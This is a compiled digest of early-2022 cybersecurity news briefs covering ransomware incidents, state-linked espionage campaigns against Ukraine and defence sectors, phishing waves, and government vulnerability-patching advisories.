    A notification from the U.S. Cybersecurity Infrastructure and Security Agency (CISA) warns that threat actors are exploiting vulnerabilities in the Zabbix open-source tool for monitoring networks, servers, virtual machines, and cloud services. The agency is asking federal agencies to patch any Zabbix servers against security issues tracked as CVE-2022-23131 and CVE-2022-23134, to avoid “significant risk” from malicious cyber actors.

    Ukraine Links Phishing Targeting Armed Forces to Belarusian Hackers

    The Computer Emergency Response Team of Ukraine (CERT-UA) warned today of a spear phishing campaign targeting private email accounts belonging to Ukrainian armed forces personnel. CERT-UA's report attributes this ongoing phishing campaign to the UNC1151 threat group, linked by Mandiant researchers with high confidence in November 2021 to the Belarusian government.

    Deadbolt Ransomware Targets Asustor and QNap NAS Devices

    Storage solutions provider Asustor is warning its customers of a wave of Deadbolt ransomware attacks targeting its NAS devices. Since January, DeadBolt ransomware operators are targeting QNAP NAS devices worldwide, its operators claim the availability of a zero-day exploit that allows them to encrypt the content of the infected systems.

    9-Year-Old Unpatched Email Hacking Bug Uncovered in Horde Webmail Software

    Users of Horde Webmail are being urged to disable a feature to contain a nine-year-old unpatched security vulnerability in the software that could be abused to gain complete access to email accounts simply by previewing an attachment. Horde Webmail is a free, browser-based communication suite that allows users to read, send, and organize email messages as well as manage and share calendars, contacts, tasks, notes, files, and bookmarks.

    New Wiper Malware Targeting Ukraine Amid Russia's Military Operation

    Cybersecurity firms ESET and Broadcom's Symantec said they discovered a new data wiper malware used in fresh attacks against hundreds of machines in Ukraine, as Russian forces formally launched a full-scale military operation against the country. The Slovak company dubbed the wiper "HermeticWiper" (aka KillDisk.NCV), with one of the malware samples compiled on December 28, 2021, implying that preparations for the attacks may have been underway for nearly two months.

    Citibank Phishing Baits Customers With Fake Suspension Alerts

    An ongoing large-scale phishing campaign is targeting customers of Citibank, requesting recipients to disclose sensitive personal details to lift alleged account holds. The campaign uses emails that feature CitiBank logos, sender addresses that look genuine at first glance, and content that is free of typos.

    Devious Phishing Method Bypasses MFA Using Remote Access Software

    One of the biggest obstacles to successful phishing attacks is bypassing multi-factor authentication (MFA) configured on the targeted victim's email accounts. Even if threat actors can convince users to enter their credentials on a phishing site, if MFA protects the account, fully compromising the account still requires the one-time passcode sent to the victim.

    Entropy Ransomware Linked to Dridex Malware Downloader

    Analysis of the recently-emerged Entropy ransomware reveals code-level similarities with the general-purpose Dridex malware that started as a banking trojan. Two Entropy ransomware attacks against different organizations allowed researchers to connect the dots and establish a connection between the two pieces of malware.

    Revamped CryptBot Malware Spread by Pirated Software Sites

    A new version of the CryptBot info stealer was seen in distribution via multiple websites that offer free downloads of cracks for games and pro-grade software. CryptBot is a Windows malware that steals information from infected devices, including saved browser credentials, cookies, browser history, cryptocurrency wallets, credit cards, and files. The latest version features new capabilities and optimizations, while the malware authors have also deleted several older functions to make their tool leaner and more efficient.

    Expeditors International Impacted by Cyberattack

    Expeditors is a Fortune 500 logistics company headquartered in Seattle, Washington, United States of America. Expeditors provide efficient and tailored supply chain solutions to customers through a worldwide network of over 350 facilities in over 100 countries and across six continents. Expeditors International was targeted in a cyberattack forcing the corporation to shut down the majority of its global operations. As reported by Bleeping Computer, the effect was substantial, since Expeditors’ operations, which comprise freight, customs, and distribution, were constrained.

    Weekly Video Update for the Week of February 14, 2022

    This week has been pretty quiet; aside from a couple of things, we've been providing our members with continuous updates on the Ukraine and Russia situation and sharing any relevant news we've come across. We are monitoring the status closely as well as our various business partners. There is a grave concern with a possible fallout from the Ukraine and Russia geopolitical situation. Although a fairly common practice and observed on the threat landscape regularly, several financial institutions were implicated in DDoS in Ukraine, and ones in Canada also experienced some downtime this week.

    Ukrainian DDoS Attacks Should Put US on Notice–Researchers

    On Tuesday, institutions central to Ukraine’s military and economy were hit with a wave of denial-of-service (DoS) attacks, which sparked an avalanche of headlines around the world. The strike itself had limited impact — but the larger implications for critical infrastructure beyond the Ukraine are worth noting, researchers said.

    Hackers Can Crash Cisco Secure Email Gateways Using Malicious Emails

    Cisco has addressed a high severity vulnerability that could allow remote attackers to crash Cisco Secure Email appliances using maliciously crafted email messages. This bug is due to an insufficient error handling issue in DNS name resolution found and reported to Cisco by Rijksoverheid Dienst ICT Uitvoering (DICTU) security researchers.

    Hackers Attach Malicious .exe Files to Teams Conversations

    Starting in January 2022, Avanan observed how hackers are dropping malicious executable files in Teams conversations. The file writes data to the Windows registry, installs DLL files and creates shortcut links that allow the program to self-administer. Avanan has seen thousands of these attacks per month. In this attack brief, Avanan will analyze how these .exe files are being used by hackers in Microsoft Teams. In this attack, hackers are attaching .exe files to Teams chats to install a Trojan on the end-user’s computer. The Trojan is then used to install malware.

    Canada's Major Banks go Offline in Mysterious Hours-long Outage

    Five major Canadian banks went offline for hours blocking access to online and mobile banking as well as e-transfers for customers. The banks reportedly hit by the outage include Royal Bank of Canada (RBC), BMO (Bank of Montreal), Scotiabank, and the Canadian Imperial Bank of Commerce (CIBC). Online banking and e-Transfers down for many Canada's five major banks went offline yesterday impeding access to e-Transfers, online and mobile banking services for many.

    Researchers Warn of a New Golang-based Botnet Under Continuous Development

    Cybersecurity researchers have unpacked a new Golang-based botnet called Kraken that's under active development and features an array of backdoor capabilities to siphon sensitive information from compromised Windows hosts. "Kraken already features the ability to download and execute secondary payloads, run shell commands, and take screenshots of the victim's system," threat intelligence firm ZeroFox said in a report published Wednesday.

    APT Has Been Shooting RATs at Aviation for Years

    Researchers have identified an advanced persistent threat (APT) group responsible for a series of cyberespionage and spyware attacks against the aviation, aerospace, transportation and defense industries since at least 2017 that feature high-volume email campaigns using industry-specific lures.

    Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology​

    Actions to Help Protect Against Russian State-Sponsored Malicious Cyber Activity:
    • Enforce multifactor authentication.
    • Enforce strong, unique passwords.
    • Enable M365 Unified Audit Logs.
    • Implement endpoint detection and response tools.

    From at least January 2020, through February 2022, the Federal Bureau of Investigation (FBI), National Security Agency (NSA), and Cybersecurity and Infrastructure Security Agency (CISA) have observed regular targeting of U.S. cleared defense contractors (CDCs) by Russian state-sponsored cyber actors. The actors have targeted both large and small CDCs and subcontractors with varying levels of cybersecurity protocols and resources. These CDCs support contracts for the U.S. Department of Defense (DoD) and Intelligence Community in the following areas:

    High-Severity RCE Security Bug Reported in Apache Cassandra Database Software

    Researchers have revealed details of a now-patched high-severity security vulnerability in Apache Cassandra that, if left unaddressed, could be abused to gain remote code execution (RCE) on affected installations. Apache Cassandra is an open-source, distributed, NoSQL database management system for managing very large amounts of structured data across commodity servers.

    The Ukraine Cyber Crisis: We Should Prepare, But Not Panic

    In a summary on the current Ukraine situation from Mandiants, Sandra Joyce, said the situation at hand could be a very big problem for everyone in various regions — not just Ukraine and Russia, “We believe that after attacking U.S. and French elections, Western media, the Olympics, and many other targets with limited repercussions, Russia is emboldened to use their most aggressive cyber capabilities throughout the West.

    BlackCat (ALPHV) Claims Swissport Ransomware Attack, Leaks Data

    The BlackCat ransomware group, aka ALPHV, has claimed responsibility for the recent cyber-attack on Swissport that caused flight delays and service disruptions. The €3 billion revenue firm, Swissport, has a presence across 310 airports in 50 countries and provides cargo handling, maintenance, cleaning, and lounge hospitality services. BlackCat has now been seen by BleepingComputer to leak a minuscule set of terabytes of data supposedly obtained from the recent ransomware attack.

    Indicators of Compromise Associated with BlackByte Ransomware

    This joint Cybersecurity Advisory was developed by the Federal Bureau of Investigation (FBI) and the U.S. Secret Service (USSS) to provide information on BlackByte ransomware. As of November 2021, BlackByte ransomware had compromised multiple US and foreign businesses, including entities in at least three US critical infrastructure sectors (government facilities, financial, and food & agriculture). BlackByte is a Ransomware as a Service (RaaS) group that encrypts files on compromised Windows host systems, including physical and virtual servers.

    Warning Over Mysterious Hackers That Have Been Targeting Aerospace and Defence Industries for Years

    An unknown criminal hacking group is targeting organizations in the aviation, aerospace, defense, transportation and manufacturing industries with trojan malware, in attacks that researchers say have been going on for years. Dubbed TA2541 and detailed by cybersecurity researchers at Proofpoint, the persistent cyber-criminal operation has been active since 2017 and has compromised hundreds of organizations across North America, Europe, and the Middle East.

    NFL's San Francisco 49ers Hit By Blackbyte Ransomware Attack

    The NFL's San Francisco 49ers team is recovering from a cyberattack by the BlackByte ransomware gang who claims to have stolen data from the American football organization. The 49ers confirmed the attack in a statement to BleepingComputer and said it caused a temporary disruption to portions of their IT network. While the 49ers did not confirm whether hackers successfully deployed the ransomware, they said they are still in the process of recovering systems, indicating that devices were likely encrypted.

    Marketing Firm Exposes Lead Data

    Security researchers at Website Planet have discovered an unsecured Amazon S3 bucket containing the Personal Identifiable Information (PII) of millions of people. Inside the bucket were ten folders, containing around 6,000 files and totaling over 1GB of data. While most (approximately 99%) of the data belongs to American residents, some information relates to people living in Canada.

    Europe's Biggest Car Dealer Hit With Ransomware Attack

    One of Europe's biggest car dealers, Emil Frey, was hit with a ransomware attack last month, according to a statement from the company. The Swiss company showed up on the list of victims for the Hive ransomware on February 1 and confirmed that they were attacked in January. The company -- which has about 3,000 employees -- generated $3.29 billion in sales in 2020 thanks to a variety of automobile-related businesses. It was ranked as the number 1 car dealership in Europe based on revenue and the total number of vehicles for sale.

    Alleged Ransomware Attack Disrupted Operations at Slovenia’s Pop TV Station

    Last week, a cyber-attack has disrupted the operations of Pop TV, the Slovenian most popular TV channel. The attack, which likely was a ransomware attack, impacted the computer network of the TV channel and caused the cancellation of the evening edition of 24UR daily news show. Slovenian news agency Zurnal24 reported that the POP TV hit from threat actors from abroad that attempted to extort money to the company to restore its systems.

    Emergency Magento Update Fixes Zero-Day Bug Exploited in Attacks

    Magento is an ecommerce website platform owned by Adobe that specializes in ecommerce websites. Magento users have access to hundreds of unique features that help them connect with their customers and sell their products. Adobe rolled out emergency updates for Adobe Commerce and Magento Open Source to fix a critical vulnerability tracked as CVE-2022-24086 that’s being exploited in the wild.

    Apple Patches Actively Exploited WebKit Zero Day

    Apple has patched yet another zero-day vulnerability, this time in its WebKit browser engine, that threat actors already are actively exploiting to compromise iPhones, iPads and MacOS devices. The zero-day, tracked as CVE-2022-22620, is a Use-After-Free issue, which is related to incorrect use of dynamic memory during program operation.

    Ukraine Dismantles Social Media Bot Farm Spreading “Panic”

    The Ukrainian Security Service said on Tuesday that it shut down a bot farm that was spreading panic on social media and had also been used to send out bomb threats. Authorities said the bot farm was used to manage more than 18,000 bot accounts and that “organizers from Russia supervised the administrators of the bot farms.” Officials detained three suspects from the Lviv region. “Two of them used their flats as premises for bot farms, the third participant was responsible for technical maintenance,” officials said. Equipment seized from their premises included two GSM gateways with 92 and two sets of GSM gateways (92 and 375 online channels), 3,000 SIM cards, and laptops and accounting records.

    Moxa Customers Urged to Patch Five Vulnerabilities Found in Mxview Network Management Software

    Moxa users are being urged to upgrade MXview to version 3.2.4 or higher to remediate five vulnerabilities discovered by Claroty's Team82. The issues affect the Taiwanese company's MXview web-based network management system versions 3.x to 3.2.2 and collectively, ICS-CERT scored the vulnerabilities a 10.0, its highest criticality score. According to Team82, an unauthenticated attacker successfully chaining two or more of these vulnerabilities could achieve remote code execution on any unpatched MXview server

    These Cybercriminals Plant Criminal Evidence on Human Rights Defender, Lawyer Devices

    Cybercriminals are hijacking the devices of civil rights activists and planting "incriminating evidence" in covert cyberattacks, researchers warn. According to SentinelLabs, an advanced persistent threat (APT) group dubbed ModifiedElephant has been responsible for widespread attacks targeting human rights activists and defenders, academics, journalists, and lawyers across India. The APT is thought to have been in operation since at least 2012, and over the past decade, ModifiedElephant has continually and persistently targeted specific, high-profile people of interest

    CISA Urges Orgs to Patch Actively Exploited Windows Serious SAM Bug

    The U.S. Cybersecurity & Infrastructure Security Agency (CISA) has added to the catalog of vulnerabilities another 15 security issues actively used in cyberattacks. The most recent one, CVE-2021-36934, is a Microsoft Windows SAM (Security Accounts Manager) vulnerability that allows anyone to access the Registry database files on Windows 10 and 11, extract password hashes and gain administrator privileges.

    FritzFrog P2P Botnet Attacking Healthcare, Education and Government Sectors

    A peer-to-peer Golang botnet has resurfaced after more than a year to compromise servers belonging to entities in the healthcare, education, and government sectors within a span of a month, infecting a total of 1,500 hosts. Dubbed FritzFrog, "the decentralized botnet targets any device that exposes an SSH server — cloud instances, data center servers, routers, etc. — and is capable of running any malicious payload on infected nodes," Akamai researchers said in a report shared with The Hacker News.

    Molerats Hackers Deploy New Malware in Highly Evasive Campaign

    The Palestinian-aligned APT group tracked as TA402 (aka Molerats) was spotted using a new implant named 'NimbleMamba' in a cyber-espionage campaign that leverages geofencing and URL redirects to legitimate websites. The campaign was discovered by Proofpoint, whose analysts observed three variations of the infection chain, all targeting governments in Middle Eastern countries, foreign policy think tanks, and a state-owned airline.

    Attackers Increasingly Adopting Regsvr32 Utility Execution Via Office Documents

    The Uptycs threat research team has been observing an increase in utilization of regsvr32.exe heavily via various types of Microsoft Office documents. Regsvr32 is a Microsoft-signed command line utility in Windows which allows users to register and unregister DLLs (Dynamic Link Library). By registering a DLL file, information is added to the central directory (Registry) so that it can be used by Windows. This makes it easier for other programs to make use of the functionalities of the DLLs.

    Wave of MageCart Attacks Target Hundreds of Outdated Magento Sites

    Analysts have found the source of a mass breach of over 500 e-commerce stores running the Magento 1 platform and involves a single domain loading a credit card skimmer on all of them. According to Sansec, the attack became evident late last month when their crawler discovered 374 infections on the same day, all using the same malware. The domain from where threat actors loaded the malware is currently offline, and the goal of the threat actors was to steal the credit card information of customers on the targeted online stores.

    PHP Everywhere RCE Flaws Threaten Thousands of WordPress Sites

    Researchers found three critical remote code execution (RCE) vulnerabilities in the 'PHP Everywhere' plugin for WordPress, used by over 30,000 websites worldwide. PHP Everywhere is a plugin that allows WordPress admins to insert PHP code in pages, posts, the sidebar, or any Gutenberg block, and use it to display dynamic content based on evaluated PHP expressions.

    Molerats Hackers Deploy New Malware in Highly Evasive Campaign

    The Palestinian-aligned APT group tracked as TA402 (aka Molerats) was spotted using a new implant named 'NimbleMamba' in a cyber-espionage campaign that leverages geofencing and URL redirects to legitimate websites. The campaign was discovered by Proofpoint, whose analysts observed three variations of the infection chain, all targeting governments in Middle Eastern countries, foreign policy think tanks, and a state-owned airline.

    Fake Windows 11 Upgrade Installers Infect You With RedLine Malware

    Threat actors have started distributing fake Windows 11 upgrade installers to users of Windows 10, tricking them into downloading and executing RedLine stealer malware. The timing of the attacks coincides with the moment that Microsoft announced Windows 11's broad deployment phase, so the attackers were well-prepared for this move and waited for the right moment to maximize their operation's success. RedLine stealer is currently the most widely deployed password, browser cookies, credit card, and cryptocurrency wallet info grabber, so its infections can have dire consequences for the victims.

    Ransomware Dev Releases Egregor, Maze Master Decryption Keys

    The Maze ransomware began operating in May 2019. It quickly rose to fame as they were responsible for data theft and double-extortion tactics now used by many ransomware operations. After Maze announced its shutdown in October 2020, they rebranded in September as Egregor, who later disappeared after members were arrested in Ukraine.

    Trends Show Increased Globalized Threat of Ransomware

    In 2021, cybersecurity authorities in the United States, Australia, and the United Kingdom observed an increase in sophisticated, high-impact ransomware incidents against critical infrastructure organizations globally. The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the National Security Agency (NSA) observed incidents involving ransomware against 14 of the 16 U.S. critical infrastructure sectors, including the Defense Industrial Base, Emergency Services, Food and Agriculture, Government Facilities, and Information Technology Sectors. The Australian Cyber Security Centre (ACSC) observed continued ransomware targeting of Australian critical infrastructure entities, including in the Healthcare and Medical, Financial Services and Markets, Higher Education and Research, and Energy Sectors.

    Kimsuki Hackers Use Commodity RATs With Custom Gold Dragon Malware

    South Korean researchers have spotted a new wave of activity from the Kimsuky hacking group, involving commodity open-source remote access tools dropped with their custom backdoor, Gold Dragon. Kimsuky is a North Korean state-sponsored hacking group, also known as TA406, who has been actively involved in cyber-espionage campaigns since 2017. The group has demonstrated impressive operational versatility and threat activity pluralism, engaging in malware distribution, phishing, data collection, and even cryptocurrency theft.

    FBI Warns of Criminals Escalating SIM Swap Attacks to Steal Millions

    The Federal Bureau of Investigation (FBI) says criminals have escalated SIM swap attacks to steal millions by hijacking victims' phone numbers. The number of complaints received from the US public since 2018 and reported losses have increased almost fivefold, according to reports received by the FBI through the Internet Crime Complaint Center (IC3) in 2021. FBI's warning comes after the US Federal Communications Commission (FCC) announced in October that it started working on rules that would pull the brake on SIM swapping attacks.

    Several Malware Families Using Pay-Per-Install Service to Expand Their Targets

    A detailed examination of a Pay-per-install (PPI) malware service called PrivateLoader has revealed its crucial role in the delivery of a variety of malware such as SmokeLoader, RedLine Stealer, Vidar, Raccoon, and GCleaner since at least May 2021. Loaders are malicious programs used for loading additional executables onto the infected machine. With PPI malware services such as PrivateLoader, malware operators pay the service owners to get their payloads "installed" based on the targets provided.

    Hackers Are Using These Old Software Flaws to Deliver Ransomware

    Cybersecurity researchers at Digital Shadows have detailed several vulnerabilities that appeared last year – or that are even older and continue to be left unpatched and exploited – which may have been missed and continue to provide opportunities for cyber criminals. Failure to patch these vulnerabilities could have potentially dangerous consequences for businesses as malicious hackers exploit them to launch ransomware attacks, malware campaigns and other cyber-criminal activity.

    Palestinian Hackers Use New NimbleMamba Implant In Recent Attacks

    An advanced persistent threat (APT) hacking group operating with motives that likely align with Palestine has embarked on a new campaign that leverages a previously undocumented implant called NimbleMamba. The intrusions leveraged a sophisticated attack chain targeting Middle Eastern governments, foreign policy think tanks, and a state-affiliated airline, enterprise security firm Proofpoint said in a report, attributing the covert operation to a threat actor tracked as Molerats (aka TA402)

    Medusa Android Banking Trojan Spreading Through Flubot's Attacks Network

    Two different Android banking Trojans, FluBot and Medusa, are relying on the same delivery vehicle as part of a simultaneous attack campaign, according to new research published by ThreatFabric. The ongoing side-by-side infections, facilitated through the same smishing (SMS phishing) infrastructure, involved the overlapping usage of "app names, package names, and similar icons," the Dutch mobile security firm said.

    FBI Releases PIN Indicators of Compromise Associated with LockBit 2.0 Ransomware

    LockBit 2.0 operates as an affiliate-based Ransomware-as-a-Service (RaaS) and employs a wide variety of tactics, techniques, and procedures (TTPs), creating significant challenges for defense and mitigation. LockBit 2.0 ransomware compromises victim networks through a variety of techniques, including, but not limited to, purchased access, unpatched vulnerabilities, insider access, and zero day exploits.

    Law Enforcement Action Push Ransomware Gangs to Surgical Attacks

    The numerous law enforcement operations leading to the arrests and takedown of ransomware operations in 2021 have forced threat actors to narrow their targeting scope and maximize the efficiency of their operations. Most of the notorious Ransomware-as-a-Service (RaaS) gangs continue their operations even after the law enforcement authorities have arrested key members but have refined their tactics for maximum impact.

    Hackers Breached a Server of National Games of China Days before the Event

    Researchers at cybersecurity firm Avast discovered that a Chinese-language-speaking threat actor has compromised systems at National Games of China in 2021. The event took place on September 15, 2021 in Shaanxi (China), it is a national version of the Olympics with only local athletes. The attackers breached a web server on September 3rd and deployed multiple reverse web shells to establish a permanent foothold in the target network.

    Russian Gamaredon APT Is Targeting Ukraine Since October

    Russia-linked cyberespionage group Gamaredon (aka Armageddon, Primitive Bear, and ACTINIUM) is behind the spear-phishing attacks targeting Ukrainian entities and organizations related to Ukrainian affairs, since October 2021, Microsoft said. This week, Palo Alto Networks’ Unit 42 reported that the Russia-linked Gamaredon APT group attempted to compromise an unnamed Western government entity operating in Ukraine in January, while geopolitical tensions between Russia and Ukraine have escalated dramatically.

    US Telecom Providers Requested $5.6B to Replace Chinese Equipment

    The U.S. government has requested telecom providers replace Chinese equipment in their networks due to security issues and allocated $1.9 billion to support the companies in the transaction. The Federal Communications Commission (FCC) said that the amount of money is not enough and that small telecom providers have requested $5.6 billion to replace Chinese gear. Another problem that telecom companies should face is the chip shortage on a global scale that is impacting the supply chain of electronic gears.

    PowerPoint Files Abused to Take Over Computers

    Attackers are using an under-the-radar PowerPoint file to hide malicious executables that can rewrite Windows registry settings to take over an end user’s computer, researchers have found. It’s one of a number of stealthy ways threat actors recently have been targeting desktop users through trusted applications they use daily, using emails that are designed to evade security detections and appear legitimate.

    Intuit Warns of Phishing Emails Threatening to Delete Accounts

    Accounting and tax software provider Intuit has notified customers of an ongoing phishing campaign impersonating the company and trying to lure victims with fake warnings that their accounts have been suspended. Intuit's alert follows reports received from customers who were emailed and told that their Intuit accounts were disabled following a recent server security upgrade.

    New Malware Used by SolarWinds Attackers Went Undetected for Years

    The threat actor behind the supply chain compromise of SolarWinds has continued to expand its malware arsenal with new tools and techniques that were deployed in attacks as early as 2019, once indicative of the elusive nature of the campaigns and the adversary's ability to maintain persistent access for years. According to cybersecurity firm CrowdStrike, which detailed the novel tactics adopted by the Nobelium hacking group last week, two sophisticated malware families were placed on victim systems — a Linux variant of GoldMax and a new implant dubbed TrailBlazer — long before the scale of the attacks came to light.

    China Condemns US Ban on Telco, Urges Need for Fair Treatment

    Beijing has lashed out at the US government's decision to ban China Unicom from offering its services in the US, describing the move as baseless. It vows to safeguard the "legitimate rights and interests" of Chinese businesses operating in the US market. China's Ministry of Industry and Information Technology (MIIT) said it strongly opposed a move by the US Federal Communications Commission (FCC) to revoke China Unicom's license, effectively banning the state-owned Chinese telco from providing services in the US market.

    Hacker Group 'Moses Staff' Using New StrifeWater RAT in Ransomware Attacks

    A politically motivated hacker group tied to a series of espionage and sabotage attacks on Israeli entities in 2021 incorporated a previously undocumented remote access trojan (RAT) that masquerades as the Windows Calculator app as part of a conscious effort to stay under the radar. Cybersecurity company Cybereason, which has been tracking the operations of the Iranian actor known as Moses Staff, dubbed the malware "StrifeWater."

    Experts Found 23 Flaws in UEFI Firmware Potentially Impact Millions of Devices

    Researchers at firmware security company Binarly have discovered 23 vulnerabilities in UEFI firmware code used by the major device makers. The vulnerabilities could impact millions of enterprise devices, including laptops, servers, routers, and industrial control systems (ICS). All these vulnerabilities affect several vendors, including Fujitsu, Siemens, Dell, HP, HPE, Lenovo, Microsoft, Intel and Bull Atos.

    CVSS 9.9-Rated Samba Bug Requires Immediate Patching

    A critical vulnerability in a popular open-source networking protocol could allow attackers to execute code with root privileges unless patched, experts have warned” (Info Security Magazine, 2022). Samba is used by organizations to implement SMB protocol for Linux, Windows and Mac. Users can use it to share files across a network. A new critical vulnerability (CVE-2021-44142) has been discovered in the software and has received a CVSS score of 9.9/10. This is one of the more dangerous vulnerabilities discovered this year.

    German Petrol Supply Firm Oiltanking Paralyzed by Cyber Attack

    Oiltanking GmbH, a German petrol distributor who supplies Shell gas stations in the country, has fallen victim to a cyberattack that severely impacted its operations. Additionally, the attack has also affected Mabanaft GmbH, an oil supplier. Both entities are subsidiaries of the Marquard & Bahls group, which may have been the breach point.

    CISA Tells Organizations to Patch CVEs Dating Back to 2014

    The US government has added eight more vulnerabilities to its growing list of CVEs that must be patched by federal agencies, including some that first appeared eight years ago. The Cybersecurity and Infrastructure Security Agency (CISA) first launched its Known Exploited Vulnerabilities Catalog in November 2021 as part of a government effort to enhance cyber-resilience.

    Over 20,000 Data Center Management Systems Exposed to Hackers

    Investigators at Cyble have found over 20,000 instances of publicly exposed DCIM systems, including thermal and cooling management dashboards, humidity controllers, UPS controllers, rack monitors, and transfer switches. Additionally, the analysts were able to extract passwords from dashboards which they then used to access actual database instances stored on the data center. The applications found by Cyble give full remote access to data center assets, provide status reports, and offer users the capacity to configure various system parameters. In most cases, the applications used default passwords or were severely outdated, allowing threat actors to compromise them or override security layers fairly easily.

    Ukraine Continues to Face Cyber Espionage Attacks from Russian Hackers

    Broadcom-owned Symantec, in a new report published Monday, attributed the attacks to an actor tracked as Gamaredon (aka Shuckworm or Armageddon), a cyber-espionage collective known to be active since at least 2013. In November 2021, Ukrainian intelligence agencies branded the group as a "special project" of Russia's Federal Security Service (FSB), in addition to pointing fingers at it for carrying out over 5,000 cyberattacks against public authorities and critical infrastructure located in the country.

    Muddywater Hacking Group Targets Turkey in New Campaign

    The Iranian-backed MuddyWater hacking group is conducting a new malicious campaign targeting private Turkish organizations and governmental institutions. This cyber-espionage group (aka Mercury, SeedWorm, and TEMP.Zagros) was linked this month to Iran's Ministry of Intelligence and Security (MOIS) by the US Cyber Command (USCYBERCOM).

    Unsecured AWS Server Exposed 3TB in Airport Employee Records

    On Monday, the SafetyDetectives cybersecurity team said the server belonged to Securitas. The Stockholm, Sweden-based company provides on-site guarding, electronic security solutions, enterprise risk management, and fire & safety services. The server contained approximately 3TB of data dating back to 2018, including airport employee records. While security researchers from ‘SafetyDetectives’ were not able to examine every record in the database, four airports were named in exposed files: El Dorado International Airport (COL), Alfonso Bonilla Aragón International Airport (COL), José María Córdova International Airport (COL), and Aeropuerto Internacional Jorge Chávez (PE).

    US Bans Major Chinese Telecom Over National Security Risks

    The Federal Communications Commission (FCC) has revoked China Unicom Americas' license, one of the world's largest mobile service providers, over "serious national security concerns." This effectively bans the telecom company from providing domestic and international telecommunication services within the United States.

    Conti Ransomware Hits Apple, Tesla Supplier

    The Conti ransomware gang has been linked to an attack on Delta Electronics, a Taiwanese electronics manufacturing company and a major supplier of power components to companies like Apple and Tesla. The attack took place last Friday, on January 21, according to a statement shared by the company with stock market authorities. Delta, which is primarily known for its powerful UPS solutions, said the attack did not impact its production systems.

    Microsoft Warns of Multi-Stage Phishing Campaign Leveraging Azure Ad

    Microsoft's threat analysts have uncovered a large-scale, multi-phase phishing campaign that uses stolen credentials to register devices onto the target's network and use them to distribute phishing emails. As the report highlights, the attacks manifested only through accounts that didn't have multi-factor authentication (MFA) protection, which made them easier to hijack.

    Conti, DeadBolt Target Delta, QNAP

    Two Taiwanese companies were affected by separate ransomware incidents this week, forcing one to scramble to restore crippled systems and another to push out an emergency update to mitigate attacks on its customers. Delta Electronics, an electronics company that provides products for Apple, Tesla, HP and Dell, disclosed Friday that “non-critical systems” were attacked by “overseas hackers” – an attack that’s been attributed to the Conti Group.

    BlackCat Ransomware Targeting US, European Retail, Construction and Transportation Orgs

    Palo Alto Networks' Unit 42 released a deep-dive into the BlackCat ransomware, which emerged in mid-November 2021 as an innovative ransomware-as-a-service (RaaS) group leveraging the Rust programming language and offering affiliates 80-90% of ransom payments. In December, the ransomware family, also known as ALPHV, racked up at least 10 victims, giving it the seventh-largest number of victims listed on their leak site among ransomware groups tracked by Unit 42.

    QNAP Devices Targeted in Ransomware Attack

    QNAP Systems, Inc. is a Taiwanese company that specializes in network-attached storage equipment for applications such as file sharing, virtualization, storage management, and surveillance. The DeadBolt ransomware organization is encrypting QNAP NAS systems all around the globe, claiming that they are exploiting a zero-day vulnerability in the device’s firmware to do so. When the attacks began QNAP clients discovered that their files had been encrypted and that their file names had been added with the.deadbolt file suffix.

    German Govt Warns of APT27 Hackers Backdooring Business Networks

    In these attacks, they successfully compromised at least nine organizations from critical sectors worldwide, including defense, healthcare, energy, technology, and education, according to Palo Alto Networks researchers. This active campaign is targeting German commercial organizations, with the attackers using the HyperBro remote access trojans (RAT) to backdoor their networks.

    VMware Urges Customers to Patch VMware Horizon Servers Against Log4j Attacks

    VMware urges customers to patch critical Log4j security vulnerabilities impacting Internet-exposed VMware Horizon servers targeted in ongoing attacks” (Security Affairs, 2022). There are currently tens of thousands of VMware Horizon servers exposed to attacks according to Shodan scans. Most recently, the Night Sky ransomware group has been exploiting Log4Shell (CVE-2021-44228) in vulnerable VMware Horizon systems. VMware has addressed their Log4Shell vulnerabilities with the release of 2111, 7.13.1, and 7.10.3, but many systems remain unpatched.

    LockBit Ransomware is Now Targeting Linux

    One of the most prolific families of ransomware now has additional Linux and VMware ESXi variants that have been spotted actively targeting organisations in recent months. Analysis by cybersecurity researchers at Trend Micro identified LockBit Linux-ESXi Locker version 1.0 being advertised on an underground forum. Previously, LockBit ransomware – which was by far the most active ransomware family at one point last year – was focused on Windows

    Latest Version of Android RAT BRATA Wipes Devices After Stealing Data

    The new version of the BRATA Android malware supports new features, including GPS tracking and a functionality to perform a factory reset on the device. First discovered by Kaspersky in 2019, BRATA’s name comes from the phrase “Brazilian RAT Android.” The RAT has been spreading via WhatsApp, SMS messages, and through the official Google Play Store.

    Multiple Cisco Products Snort Modbus Denial of Service Vulnerability

    A vulnerability in the Modbus preprocessor of the Snort detection engine could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to an integer overflow while processing Modbus traffic. An attacker could exploit this vulnerability by sending crafted Modbus traffic through an affected device. A successful exploit could allow the attacker to cause the Snort process to hang, causing traffic inspection to stop.

    Hackers Exploited MSHTML Flaw to Spy on Government and Defense Targets

    Researchers from Trellix a new company created following the merger of security firms McAfee Enterprise and FireEye, attributed the attacks with moderate confidence to the Russia-based APT28 group, the threat actor behind the compromise of SolarWinds in 2020, based on similarities in the source code as well as in the attack indicators and geopolitical objectives.

    Staff Negligence Is Now a Major Reason for Insider Security Incidents

    According to Proofpoint's 2022 Cost of Insider Threats Global report, published on Tuesday, insider threats now cost organizations $15.4 million annually, an increase of 34% in comparison to 2020 estimates. The report, conducted by the Ponemon Institute, includes survey responses from over 1,000 IT professionals worldwide, all of which have experienced a recent cybersecurity incident due to an insider threat.

    US Adds 17 Exploited Bugs to "Must Patch" List

    A US government’s security agency has added 17 vulnerabilities currently being actively exploited in the wild to a database of bugs that federal agencies must fix. The Known Exploited Vulnerabilities Catalog was launched in November last year as part of Binding Operational Directive (BOD) 22-01, designed to make civilian federal government agencies more cyber-resilient.

    Researchers Break Down Whisper Gate Wiper Malware Used in Ukraine Website Defacement

    Cisco Talos says that two wipers are used in WhisperGate attacks. The first wiper attempts to destroy the master boot record (MBR) and to eradicate any recovery options. "Similar to the notorious NotPetya wiper that masqueraded as ransomware during its 2017 campaign, WhisperGate is not intended to be an actual ransom attempt, since the MBR is completely overwritten," the researchers say. However, with many modern systems now moving to GUID Partition Tables (GPTs), this executable may not be successful – and so an additional wipe has been included in the attack chain.

    Investigating APT36 or Earth Karkaddan’s Attack Chain and Malware Arsenal

